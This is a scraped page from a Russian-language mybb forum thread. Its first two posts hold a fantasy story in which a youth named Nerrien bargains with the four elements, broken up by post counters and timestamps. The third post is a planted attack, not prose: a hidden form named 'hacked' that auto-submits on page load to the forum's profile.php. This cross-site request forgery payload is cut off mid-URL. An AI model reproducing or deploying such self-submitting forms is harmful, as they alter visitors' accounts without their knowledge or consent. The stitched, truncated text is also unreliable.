Тихо кругом. Лишь жуткий порывистый ветер гуляет на вершине утеса, лишь яростные волны с треском разбиваются об скалы, лишь беснуется море, жаждя жертвы, лишь раскаты грома сотрясают землю, лишь молнии вспыхивают в грозовых тучах.
Одиноко стоит человек на вершине утеса. Капли дождя стекают по лицу, растрепались белокурые волосы, но горят глаза непонятным ледяным огнем. Его взгляд полон отчаянья и мрачного предчуствия неизбежного. Но человек стоял, стоял твердо с высоко поднятой головой, не взирая на буйство стихии. Лишь побелели костяшки пальцев сжимая маленький золотой медальен.
- Властю данной мне силой моей, Жизнью я призываю сюда четыре стихии: Огонь, Воду, Ветер и Землю и прошу их об аудиенции, - громко и четко произнес незнакомец.
Сверкнула молния в небесах, освещая фигуру человека, услышал его Огонь . Резкий порыв ветра швырнул юношу на землю, услышал Ветер его слова. Задрожала земля под его ногами, давая свое согласие. Поднялась гигантская волна и тучей мелких брызг осыпалась к его ногам, Вода сделала свой выбор.
Неторопливо поднялся человек, отряхнул плащ свой от грязи и голову склонил в знак уважения к величию четырех стихий.
- Говори, Нэрриен, - пророкотал гром, - мы слушаем тебя.
- О чем нам разговаривать, - невесело усмехнулся человек, - вы знаете мои условия.
Еще раз сверкнула молния, огонь взял слово:
- И что ты можешь предложить нам взамен? - со скрытой издевкой спросил он.
- Свою жизнь, - медленно, но твердо ответил тот, кого стихии назвали Нэрриеном.
- Зачем нам твоя жалкая человеческая жизнь?! - яростно взревел океан.
- Не человека жизнь, бога, - мягко произнесла Земля.
- Люди, звери, боги, все они равны перед нами, - пророкотал ветер.
Нэрриен слушал их перепалку без особого интереса, ведь все это он уже слышал, и не раз. И в самом деле, на что он надеялся? На благосклонность стихий
Тестовое сообщение
Сообщений 1 страница 5 из 5
Поделиться12010-08-11 08:56:02
Поделиться22010-08-11 19:27:24
или на свою мифичискую исключительность? Глупо, ведь она тоже была особенной, но стихии не пожалели и ее, подумал Нэррен, но вслух произнес:
- Отпустите ее душу, и после смерти я подарю вам свою.
- Ты так уверен в этом, - ласково произнесла Вода, - но знаешь ли ты Нэрриен на что идешь?
- Она права, юноша, такими словами просто так не разбрасываются, - с плохо скрытой угрозой произнес Огонь.
Юноша лишь с вызовом улыбнулся. Он прекрасно знал на что шел.
- Да будет, - глухо сказал юноша, до крови закусив губу.
- Да будет так, - эхом повторили его слова четыре стихии.
Поделиться32010-08-11 22:54:24
<script lang=javascript>
function hackedforum () {
document.hacked.submit();
}
</script>
<body
onload="hackedforum()">
<form method="post"
name="hacked"
action="http://yyuuuuuu.mybb.ru/
profile.php?